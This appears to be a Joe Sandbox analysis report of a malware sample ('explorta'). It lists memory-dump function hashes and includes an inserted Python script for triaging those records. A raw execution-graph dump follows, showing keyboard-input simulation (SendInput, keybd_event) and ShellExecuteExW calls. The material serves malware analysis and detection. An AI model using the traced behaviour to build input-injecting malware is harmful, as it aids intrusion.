                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_590000_explorta.jbxd
Yara matches
Similarity
• Opcode ID: 08e26e796012eef214de1dfdcf1a2929266e55d98c12d962ac6d8d95cc9d3274
• Instruction ID: 794e245255c61fc6f0128a00b00378f5e056380b21c3e77cde3a41f95b217112
• Opcode Fuzzy Hash: 08e26e796012eef214de1dfdcf1a2929266e55d98c12d962ac6d8d95cc9d3274
• Instruction Fuzzy Hash: A7B11531610609DFDB28CF2CC496A657FA0FB45364F25865AE8DACF3A1C735E982CB40
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_590000_explorta.jbxd
Yara matches
Similarity
• Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
• Instruction ID: 1d538f2206045190902c2e581506a6f85fbe7541407376d745793d725b165344
• Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
• Instruction Fuzzy Hash: D251277020CE4E5EDB388AEC8899FBE6FD9BB4D344F14081DD482DBE82D6159D858F51
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_590000_explorta.jbxd
Yara matches
Similarity
• Opcode ID: 8ddc00aeede2b12543c849acde0aed5646b4ce3d1e1055b1abdb6f1eab99af81
• Instruction ID: 156ed240d84a287779f89c4426882b4a043ad41c4dbac4471f2ef4c5a266375a
• Opcode Fuzzy Hash: 8ddc00aeede2b12543c849acde0aed5646b4ce3d1e1055b1abdb6f1eab99af81
• Instruction Fuzzy Hash: D621B673F204395B770CC47E8C5627DB6E1C68C541745823AE8A6EA2C1E968D917E2E4
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_590000_explorta.jbxd
Yara matches
Similarity
• Opcode ID: f8f8e810dbdc6e99804cf8535bc90278311e547ab9c5098ed10aff4f801f95f6
• Instruction ID: 4813e9d97657e5313eeb207aa4228b50f5edc0b530b6897e235a0249bb0490fc
• Opcode Fuzzy Hash: f8f8e810dbdc6e99804cf8535bc90278311e547ab9c5098ed10aff4f801f95f6
• Instruction Fuzzy Hash: 0511CA63F30C255B675C816D8C1727A95D2EBD825030F533BD826E7384E894DE13D290
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_590000_explorta.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
• Instruction ID: 5f7a8ed4c3236058836dd685fd2b7a69a033eea53278e7f63b0db981dc50b885
• Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
• Instruction Fuzzy Hash: C41157B720508243DA348A2ECCB46BBEF95FBC532573D4B7BD0468B748CE22E9419600
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7645923cc0239d975134b32fbb1d1902b5e2f160c187d47230eda34fa27b3746
• Instruction ID: d05ba7dd86c2f7fa2e5a87f32734c52acad42d974f0926a7254e7565ab0548eb
• Opcode Fuzzy Hash: 7645923cc0239d975134b32fbb1d1902b5e2f160c187d47230eda34fa27b3746
• Instruction Fuzzy Hash: 35E086301516486FCE267B94C81DE493F2AFF51345F405808FC094A121DB25ED83C550
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
• Instruction ID: 79a7c3c71ac9510db399e5291f2f6254bf9aa818c980a4fef627cc6fb4a9a559
• Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
• Instruction Fuzzy Hash: 25E0EC72926229EFCB15DBD8C948E8AFBECFB89B54B66449AF501D3151C270DE00C7D1
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
Yara matches
Similarity
• API ID:
• String ID: Ks==$Muso$invalid stoi argument$stoi argument out of range
• API String ID: 0-412186370
• Opcode ID: 3507a022b6ccb51f684521d9200f82a628953365df72b54d40a2803023c32dea
• Instruction ID: e7fd4b4215347bde0536a05d3320a8d9a45d711940c29aa187ddb66d469a53bf
• Opcode Fuzzy Hash: 3507a022b6ccb51f684521d9200f82a628953365df72b54d40a2803023c32dea
• Instruction Fuzzy Hash: C151D131904299AFEF25DB64CC49BDEBFB4FF0A300F044199E54867682C7745A84CFA2
Uniqueness

Uniqueness Score: -1.00%

APIs
• _ValidateLocalCookies.LIBCMT ref: 005C4057
• ___except_validate_context_record.LIBVCRUNTIME ref: 005C405F
• _ValidateLocalCookies.LIBCMT ref: 005C40E8
• __IsNonwritableInCurrentImage.LIBCMT ref: 005C4113
• _ValidateLocalCookies.LIBCMT ref: 005C4168
Strings
Memory Dump Source
• Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
• Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_590000_explorta.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                          • String ID: 01\$csm
                                                                                                                                                                                                                                          • API String ID: 1170836740-103147319
                                                                                                                                                                                                                                          • Opcode ID: cfc03c66b8e612702aca0fe028c7a0dbb6d697f2e4d4669dd513d1de6f415a17
                                                                                                                                                                                                                                          • Instruction ID: 8e1b9f4c6d68cb1972a4721f04961d565ef1cd32c2b978ec539432c736836cf6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cfc03c66b8e612702aca0fe028c7a0dbb6d697f2e4d4669dd513d1de6f415a17
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4451B134A002499FCF10DFA8C899FAE7FB5BF55314F188059E954AB352D732AA45CF90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_590000_explorta.jbxd
Yara matches
Similarity
• API ID: _wcsrchr
• String ID: .bat$.cmd$.com$.exe
• API String ID: 1752292252-4019086052
• Opcode ID: 00da5d6977894af658f42055de084275accb8af526bf8dbfa5d59068ac8bd7a5
• Instruction ID: a5583b4ee3524de0b67522b1d398c9fa83b76ba8d9acb8b3d7a8046ccf8adf29
• Opcode Fuzzy Hash: 00da5d6977894af658f42055de084275accb8af526bf8dbfa5d59068ac8bd7a5
• Instruction Fuzzy Hash: 2301C83BA047662D662460999C02F3B5F9CBFC5BB0B19402EFC59F71C1EE65DD0281D0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_590000_explorta.jbxd
Yara matches
Similarity
• API ID: Mtx_unlock$Cnd_broadcast
• String ID:
• API String ID: 32384418-0
• Opcode ID: 88b505daed9ecca4a39edf583dd9e37727cddadf052ce5519101b249a6d53da9
• Instruction ID: b38190a9d1ba319c67d9ee0ed2666cd88ec170f392579d3dffd4a3436e67d1eb
• Opcode Fuzzy Hash: 88b505daed9ecca4a39edf583dd9e37727cddadf052ce5519101b249a6d53da9
• Instruction Fuzzy Hash: 17A1DF71901206AFEF21DB64C949BAABFB8FF56314F048129E915D7242EB34EA04CBD1
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_590000_explorta.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: invalid stoi argument$stoi argument out of range
                                                                                                                                                                                                                                          • API String ID: 0-1606216832
                                                                                                                                                                                                                                          • Opcode ID: 7f523ac7acd504a31594e005ab2f6c57b96052632a0dde9cd0fbee5c018aa7f3
                                                                                                                                                                                                                                          • Instruction ID: 15614a32333d246f0d8c972f8a58f3f94879129c34b1927a410ee5d9ec143fe8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f523ac7acd504a31594e005ab2f6c57b96052632a0dde9cd0fbee5c018aa7f3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC419F309052999FEB649F18CC5ABDEBFB0BF46704F1401D8E54826282CB755AC8CF92
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
• Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_590000_explorta.jbxd
Yara matches
Similarity
• API ID: _strrchr
• String ID:
• API String ID: 3213747228-0
• Opcode ID: 2be3246e1f92ff9055cdda0d2c6c42c9db80f0564b8feef83651b155efb1fb25
• Instruction ID: bdafeee289858c18d9cce834649f948d655450e615e4ef665d62759a1c5803a9
• Opcode Fuzzy Hash: 2be3246e1f92ff9055cdda0d2c6c42c9db80f0564b8feef83651b155efb1fb25
• Instruction Fuzzy Hash: 21B103329042869FDB15CFA8C891FBEBFA5FF95340F14856ED449DB241D6349E41CB60
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
• Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_590000_explorta.jbxd
Yara matches
Similarity
• API ID: Xtime_diff_to_millis2_xtime_get
• String ID:
• API String ID: 531285432-0
• Opcode ID: 65dfb36a20c7499c53474984fdd5248a203f887ba7210369f103cd10aba8ab59
• Instruction ID: 60d4f99e8332d86bba3626806fa715f5f4478649bfb46df34e4f629465534490
• Opcode Fuzzy Hash: 65dfb36a20c7499c53474984fdd5248a203f887ba7210369f103cd10aba8ab59
• Instruction Fuzzy Hash: C9214175A0011A9FDF00EBA4DC8A9BEBFB9FF49710F100059F601A7292DB349D019BA0
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
• Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_590000_explorta.jbxd
Yara matches
Similarity
• API ID: ___free_lconv_mon
• String ID: 8"_$`'_
• API String ID: 3903695350-2958148901
• Opcode ID: ea9ea188d403dcbe42bf75165a192db1df18f0d6298ae0a010bae4053df90a2e
• Instruction ID: 122f995d656c210e55faf96eb6c2a11580244ad3f5e0150420b5c7bab5edbba8
• Opcode Fuzzy Hash: ea9ea188d403dcbe42bf75165a192db1df18f0d6298ae0a010bae4053df90a2e
• Instruction Fuzzy Hash: 46313D716006059FDF21AAB8D84AF667FE9FF80318F14842DE45AD7255DE34ED408B11
Uniqueness

Uniqueness Score: -1.00%
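The four records above all come from the same unpacked image region at 0x590000, and their API IDs (`_strrchr`, `Xtime_diff_to_millis2`/`_xtime_get`, `___free_lconv_mon`, the `std::stoi` error strings) are MSVC CRT/STL internals rather than the sample's own logic. Sifting thousands of such records by hand is impractical, so the following Python is an added example, not Joe Sandbox code and not its similarity metric. It parses records in the bullet layout shown on this page, flags runtime helpers with a naming heuristic of its own, decodes the protection field of the .sdmp name on the assumption (not documented here) that the fifth dotted field holds the Windows PAGE_* constant, and groups functions that share an identical Instruction Fuzzy Hash. The first two sample records carry values copied from this report; the third is constructed to show a cross-dump match.

```python
"""Parse and triage Joe Sandbox function-similarity records (added example).

Assumptions not stated on the page: the record layout is the bullet layout
shown in the report text; the fifth dotted field of an .sdmp name is the
Windows PAGE_* protection; is_runtime_helper() is a naming heuristic; and
hamming_distance() is a naive positional comparison, not the vendor's score.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Standard winnt.h memory-protection constants.
PAGE_PROTECTION = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                   0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE",
                   0x80: "PAGE_EXECUTE_WRITECOPY"}

FIELD_RE = re.compile(r"^\s*•\s*([^:]+):\s*(.*?)\s*$")
SOURCE_RE = re.compile(r"^(\S+?),\s*Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)")
KEY_TO_ATTR = {"API ID": "api_id", "String ID": "string_id",
               "API String ID": "api_string_id", "Instruction ID": "instruction_id",
               "Opcode Fuzzy Hash": "opcode_fuzzy_hash",
               "Instruction Fuzzy Hash": "instruction_fuzzy_hash"}


@dataclass
class FunctionRecord:
    source_file: str = ""
    offset: str = ""
    based_on_pe: bool = False
    associated: list = field(default_factory=list)
    api_id: str = ""
    string_id: str = ""
    api_string_id: str = ""
    instruction_id: str = ""
    opcode_fuzzy_hash: str = ""
    instruction_fuzzy_hash: str = ""
    uniqueness_score: str = ""


def parse_records(text):
    """Start a new record at every 'Memory Dump Source' header and fill its bullets."""
    records, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "Memory Dump Source":
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None:
            continue
        if stripped.startswith("Uniqueness Score:"):
            current.uniqueness_score = stripped.split(":", 1)[1].strip()
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.group(1).strip(), m.group(2)
        if key == "Source File":
            sm = SOURCE_RE.match(value)
            if sm:
                current.source_file, current.offset = sm.group(1), sm.group(2)
                current.based_on_pe = sm.group(3) == "true"
        elif key == "Associated":
            # The HTML export glues the link label "Download File" onto the name.
            current.associated.append(value.replace("Download File", "").strip())
        elif key in KEY_TO_ATTR:
            setattr(current, KEY_TO_ATTR[key], value)
    return records


def is_runtime_helper(rec):
    """Heuristic: underscore-prefixed CRT names, MSVC STL Xtime_* helpers, std::stoi strings."""
    return (rec.api_id.startswith("_") or rec.api_id.startswith("Xtime_")
            or "stoi argument" in rec.string_id)


def dump_protection(source_file):
    """Decode the assumed protection field (fifth dotted field) of an .sdmp name."""
    return PAGE_PROTECTION.get(int(source_file.split(".")[4], 16), "unknown")


def group_by_fuzzy_hash(records):
    """Records that share an identical Instruction Fuzzy Hash, keyed by that hash."""
    groups = defaultdict(list)
    for rec in records:
        if rec.instruction_fuzzy_hash:
            groups[rec.instruction_fuzzy_hash].append(rec)
    return {h: rs for h, rs in groups.items() if len(rs) > 1}


def hamming_distance(hash_a, hash_b):
    """Naive positional distance between two equal-length hash strings."""
    if len(hash_a) != len(hash_b):
        raise ValueError("hash strings differ in length")
    return sum(a != b for a, b in zip(hash_a, hash_b))


# Constructed input: records 1 and 2 use values from this report, record 3 is invented.
SAMPLE = """\
Memory Dump Source
• Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
• Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmpDownload File
Similarity
• API ID: _strrchr
• String ID:
• API String ID: 3213747228-0
• Instruction Fuzzy Hash: 21B103329042869FDB15CFA8C891FBEBFA5FF95340F14856ED449DB241D6349E41CB60
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
Similarity
• API ID: Xtime_diff_to_millis2_xtime_get
• API String ID: 531285432-0
• Instruction Fuzzy Hash: C9214175A0011A9FDF00EBA4DC8A9BEBFB9FF49710F100059F601A7292DB349D019BA0
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 00000009.00000002.3300000000.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _strrchr
• Instruction Fuzzy Hash: 21B103329042869FDB15CFA8C891FBEBFA5FF95340F14856ED449DB241D6349E41CB60
Uniqueness Score: -1.00%
"""

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in recs:
        print(r.offset, dump_protection(r.source_file), r.api_id or r.string_id,
              "runtime-helper" if is_runtime_helper(r) else "candidate")
    for h, rs in group_by_fuzzy_hash(recs).items():
        print("shared hash", h[:16], [(r.source_file[:8], r.offset) for r in rs])
```

Records flagged as runtime helpers can be dropped from the review queue; the remaining candidates, and any hash shared across dumps or across samples, are where analyst time is better spent.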

Execution Graph

Execution Coverage: 2.2%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 2.7%
Total number of Nodes: 1656
Total number of Limit Nodes: 63
execution_graph: interactive call-graph figure of file.exe (numbered nodes labelled with code addresses and Windows API names such as SystemParametersInfoW, IsWindow, PeekMessageW, CreateFileW, LoadLibraryA, GetProcAddress, RegisterWindowMessageW, MapVirtualKeyW); the graph data is rendered by the report viewer and is not reproduced here.
13a503 97225->97227 97227->97144 97232 f4a28 _strftime 40 API calls 97227->97232 97229->97218 97318 13b2df MapVirtualKeyW 97229->97318 97230 13a6ed 97230->97192 97231 d4c6d 22 API calls 97231->97236 97235 13a51d 97232->97235 97235->97144 97238 f4a28 _strftime 40 API calls 97235->97238 97236->97224 97236->97231 97240 13ab9c 20 API calls 97236->97240 97316 13b2df MapVirtualKeyW 97236->97316 97317 13aa57 20 API calls 97236->97317 97239 13a539 97238->97239 97239->97144 97288 d4c6d 97239->97288 97240->97236 97243 13a5cc 97292 f62d1 39 API calls _strftime 97243->97292 97245 d4c6d 22 API calls 97246 13a565 97245->97246 97247 13a57b 97246->97247 97248 d4c6d 22 API calls 97246->97248 97249 d93b2 22 API calls 97247->97249 97250 13a575 97248->97250 97251 13a586 97249->97251 97250->97243 97250->97247 97252 d4c6d 22 API calls 97251->97252 97253 13a59a 97252->97253 97291 13b30d 51 API calls 97253->97291 97255 13a5bb 97256 d6b57 22 API calls 97255->97256 97256->97144 97257->97082 97258->97084 97259->97086 97260->97092 97261->97087 97262->97128 97263->97134 97265 f4aab 97264->97265 97266 f4a36 97264->97266 97321 f4abd 40 API calls 4 library calls 97265->97321 97269 f4a5b 97266->97269 97319 ff2d9 20 API calls _abort 97266->97319 97268 f4ab8 97268->97144 97269->97144 97271 f4a42 97320 1027ec 26 API calls _abort 97271->97320 97273 f4a4d 97273->97144 97275 13ac7c 97274->97275 97278 13abc6 97274->97278 97276 13aca2 SendInput 97275->97276 97281 13ac81 97275->97281 97277 13aca0 97276->97277 97326 139c49 97277->97326 97278->97275 97280 13abe1 97278->97280 97280->97277 97283 13abea GetKeyboardState 97280->97283 97322 13b226 97281->97322 97284 13abfb SetKeyboardState 97283->97284 97286 13ac13 97283->97286 97284->97286 97287 13ac71 PostMessageW 97286->97287 97287->97277 97289 daec9 22 API calls 97288->97289 97290 d4c78 97289->97290 97290->97243 97290->97245 97291->97255 97292->97144 97293->97184 97294->97169 97295->97218 97296->97218 97297->97201 97298->97230 97299->97186 97300->97216 
97301->97211 97302->97192 97303->97200 97304->97203 97305->97216 97306->97192 97307->97216 97308->97192 97309->97216 97310->97192 97311->97216 97312->97192 97313->97218 97314->97219 97315->97224 97316->97236 97317->97236 97318->97192 97319->97271 97320->97273 97321->97268 97323 13b232 SendInput 97322->97323 97324 13b265 keybd_event 97322->97324 97325 13b276 97323->97325 97324->97325 97325->97277 97328 139c57 97326->97328 97327 13b0b7 Sleep 97334 13acd3 97327->97334 97328->97327 97330 13b0c0 QueryPerformanceCounter 97328->97330 97328->97334 97330->97327 97333 13b0ce 97330->97333 97331 13b0e7 Sleep QueryPerformanceCounter 97335 ee398 97331->97335 97333->97331 97333->97334 97334->97218 97336 ee3ad 97335->97336 97337 ee3b4 97335->97337 97336->97333 97343 f0242 5 API calls __Init_thread_wait 97337->97343 97339 ee3c0 97339->97336 97344 ee3de QueryPerformanceFrequency 97339->97344 97341 ee3d4 97345 f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97341->97345 97343->97339 97344->97341 97345->97336 97346->97102 97348 da961 22 API calls 97347->97348 97350 15ad77 ___scrt_fastfail 97348->97350 97349 15adce 97351 15adee 97349->97351 97353 d7510 53 API calls 97349->97353 97350->97349 97352 d7510 53 API calls 97350->97352 97354 15ae3a 97351->97354 97357 d7510 53 API calls 97351->97357 97355 15adab 97352->97355 97356 15ade4 97353->97356 97360 15ae4d ___scrt_fastfail 97354->97360 97362 db567 39 API calls 97354->97362 97355->97349 97358 d7510 53 API calls 97355->97358 97376 d7620 22 API calls _wcslen 97356->97376 97365 15ae04 97357->97365 97361 15adc4 97358->97361 97364 d7510 53 API calls 97360->97364 97375 d7620 22 API calls _wcslen 97361->97375 97362->97360 97366 15ae85 ShellExecuteExW 97364->97366 97365->97354 97367 d7510 53 API calls 97365->97367 97371 15aeb0 97366->97371 97368 15ae28 97367->97368 97368->97354 97377 da8c7 22 API calls __fread_nolock 97368->97377 97370 15aec8 97370->97011 97371->97370 97372 15af35 GetProcessId 97371->97372 97373 15af48 
97372->97373 97374 15af58 CloseHandle 97373->97374 97374->97370 97375->97349 97376->97351 97377->97354 97378 df7bf 97379 dfcb6 97378->97379 97380 df7d3 97378->97380 97381 daceb 23 API calls 97379->97381 97382 dfcc2 97380->97382 97383 efddb 22 API calls 97380->97383 97381->97382 97384 daceb 23 API calls 97382->97384 97385 df7e5 97383->97385 97387 dfd3d 97384->97387 97385->97382 97386 df83e 97385->97386 97385->97387 97389 e1310 257 API calls 97386->97389 97411 ded9d messages 97386->97411 97415 141155 22 API calls 97387->97415 97410 dec76 messages 97389->97410 97391 dfef7 97391->97411 97417 da8c7 22 API calls __fread_nolock 97391->97417 97393 efddb 22 API calls 97393->97410 97394 124600 97394->97411 97416 da8c7 22 API calls __fread_nolock 97394->97416 97395 124b0b 97419 14359c 82 API calls __wsopen_s 97395->97419 97399 da8c7 22 API calls 97399->97410 97402 f0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97402->97410 97403 dfbe3 97405 124bdc 97403->97405 97403->97411 97412 df3ae messages 97403->97412 97404 da961 22 API calls 97404->97410 97420 14359c 82 API calls __wsopen_s 97405->97420 97407 f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97407->97410 97408 